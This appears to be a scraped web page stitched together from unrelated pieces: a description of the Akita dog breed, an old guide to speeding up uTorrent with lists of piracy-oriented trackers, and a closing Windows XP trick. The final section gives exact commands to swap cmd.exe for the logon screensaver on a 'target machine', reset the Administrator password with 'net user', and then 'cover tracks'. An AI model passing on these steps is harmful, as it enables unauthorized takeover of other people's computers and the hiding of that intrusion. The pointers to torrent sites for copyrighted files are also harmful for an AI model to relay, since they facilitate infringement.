The Akita is a strong, beautiful dog that always makes a lasting first impression.
Akitas are large, powerful dogs with very substantial bone and musculature. Their broad chest and neck serve as a solid base for its large head, the one feature that most distinguishes it from any other breed. If you view an Akita from above you will find it's broad skull and the short muzzle form a blunt triangle. The massive head together with the small triangular shaped eyes and small, erect ears give the Akita an intimidating, yet very dignified, expression.
The Akita is a very balanced looking dog, being only slightly longer than it is tall. The tail is curled and carried over the back, which serves to balance with the dog's head. Typically the male Akita is substantially larger than the female. The males range in weight from about 44kgs-57kgs (100-150 lbs), while the females range from 31kgs-44kgs (70-110 lbs). .
The double coat of the Akita has the appearance of the typical northern breeds. It is short to moderate in length, but very dense and consists of two layers. The undercoat is very soft and is the primary insulator, while the outer coat, or the guard hair, is slightly longer and coarser. The Akita is very well suited to the coldest of climates, but appears to acclimatise to the weather in the Caribbean well - Barbados can reach 32degrees C, however its coat does lighten considerably in a warmer climate to compensate for the heat, but we always keep iced water available throughout the day and night to make sure that they do not experience any heat exhaustion .
Akita's personalities are very complex. While temperaments vary, most would agree that the Akita is a very intelligent, extremely loyal animal, but can exhibit aggressive tendencies towards other dogs of the same sex, though rarely to people.
Akitas do however have a very well developed guarding and protective instinct. Akitas also have a high and well-developed prey drive too. An Akita is not likely to show affection to someone that is not a member of his family or a close friend that he sees frequently. .
Loyalty and devotion displayed by an Akita is phenomenal. The typical pet Akita will follow you from room to room, yet has the uncanny ability not to be under foot. Your Akita lives his life as if his only purpose is to protect you and spend time with you.
Akitas as a Pet
Even though Akitas are large, hardy dogs, which can withstand the elements, they have been bred for centuries to be house companions. The two most outstanding characteristics of the Akita as a pet are that they are very clean and that they are very easy to house train and are almost completely odour-less. Most Akitas respond so well to housetraining that they are trained in a matter of weeks.
As far as the family children are concerned, there are a few worries. Akitas are devoted, patient friends and protectors of children. Akitas are typically very gentle with children, however precautions should be taken until the Akita understands the situation.

Speed up uTorrent
1) Read Utorrent website to fimilarize yourself with all the terms
2) Next visit http://www.speakeasy.net/speedtest/ pick the city closest to yours and get your max upload speed. Now with that same number, (for eg. 300 kb/s) divide first by 8 (eg. 300/8 = 37.5) then take that number you just got and multiply it by .8 (eg. 37.5*.8 = 30) (If you are good with percentages, then just take 10%. ;) The final number you get is your Global Max Upload, which can be set in the Preferences section of Utorrent.
Note: If you do not live in the US, visit here and pick the city closest to you, http://www.dslreports.com/speedtest?more=1
3) Download Utorrent 1.75 here: http://www.utorrent.com/download.php
4)Install and then run Utorrent.
5) Under Preferences, select a random listening port. Check this site for vulnerabilities first however, http://www.commodon.com/threat/threat-ports.htm
6) Run this test and follow all the steps it tells you to GREATLY improve your cable/dsl connection.
http://www.broadbandreports.com/tweaks
Under advertised speed, use the max speed you got after taking the speed test.
7)If you are behind a firewall such as McAfee, please allow full access to the internet for Utorrent. If Using Windows firewall, then you must do the following: Open Windows firewall through the Control Panel. Go to the Exceptions tab and press Add Port. Then add the port # you selected in step 5.
If you are behind a router, please visit http://www.portforward.com and then select your router, and then Utorrent or torrent. Follow every step to forward your ports and allow greater access to better speeds for your torrents.
9) If possible, register with private trackers such as http://torrentleech.org or http://scenetorrents.org . If these are full, keep trying as they ban people on the regular leaving open spots.
If not, use decent public trackers such as http://mininova.org , http://thepiratebay.org , http://isohunt.com or ONE of my favorite, http://torrentspy.com
10) Download the torrent of your choice that has the most Seeds but least amount of leechers. Keep in mind, torrents with for eg. 8 seeds will download slower than a torrent with 100+ seeds.
11) When downloading large files (500+ MB) it takes up to 30 minutes to get up to full speed, so dont worry if you start off slow. Also do NOT download more than one torrent at a time.
12) Under preferences in Utorrent, go to Torrents and set "global max number of connections" to 450 and "max number of connected peers per torrent" to 200 (as to not crash your router).
13) While still in preferences, go to Network and set Protocol Encryption to ENABLED. http://img299.imageshack.us/img299/4324/setts7qc.png
Well ive tried to keep this small guide short and sweet, and I hope it helps the many out there who still have problems with torrent downloading
PS. In case anyone is not sure that this works, i have a 10000kb (1.4 MB) connection, forwarded through a Netgear Router, registered with a private tracker and i get normally 500-1300 KB/s download speed.

Isohunt.com September, 2007: Isohunt is barring American users from connecting to American torrent trackers. American users, however, can still use Isohunt to find torrents, and connect to third party trackers.July, 2007: Isohunt has over 450,000 torrents in their database. Also noteworthy: any Isohunt torrent listed as "ISOhunt release" means that it is a file verified by the administrators...a nice feature to help you locate authentic torrents and not fake files. On a sad note: Isohunt is being sued by the Motion Picture Association of America (MPAA) for copyright infringement. If you want to use this tremendous Canadian site, you better use it while you can.
Demonoid Sep. 26, 2007 update: Canadian users can no longer access Demonoid.com. Details are forthcoming, but their Canadian ISP shut them down by court order. The Canadian Recording Industry Association is behind this court order.

Pirate Bay has an immense database of 600,000+ torrents, the largest database at this time.)(May 31, 2006: The Pirate Bay has been shut down by Swedish authorities. Details are available on the Pirate Bay home page.)(June 2006: The Pirate Bay has restarted operations, now that the police have duplicated the PB hard drives for forensic purposes. Warning for new users: while P2P file sharing technology is completely legal, many of the files traded through P2P are copyrighted. Unless you live in Canada where users are shielded from P2P lawsuits, then downloading P2P files may put you at risk for a civil lawsuit in any other country. These lawsuits are usually class-action suits, filed against groups of users who blatantly copy and distribute copyrighted materials. Recently, the MPAA, the RIAA, and the governments of England and Australia took several thousand users to court, demanding that they pay thousands of dollars in copyright infringement penalties.
Your Internet Service Provider may, at their discretion, release their logs of your downloading activity to potential copyright plaintiffs. The more megabytes you download, the more you risk being sued by copyright protection groups. Please know this risk before you use any of the following Torrent search engines below.

If you log into a limited account on your target machine and open up a dos promptthen enter this set of commands Exactly:
cd\ *drops to rootcd\windows\system32 *directs to the system32 dirmkdir temphack *creates the folder temphackcopy logon.scr temphack\logon.scr *backsup logon.scrcopy cmd.exe temphack\cmd.exe *backsup cmd.exedel logon.scr *deletes original logon.scrrename cmd.exe logon.scr *renames cmd.exe to logon.screxit *quits dos
Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
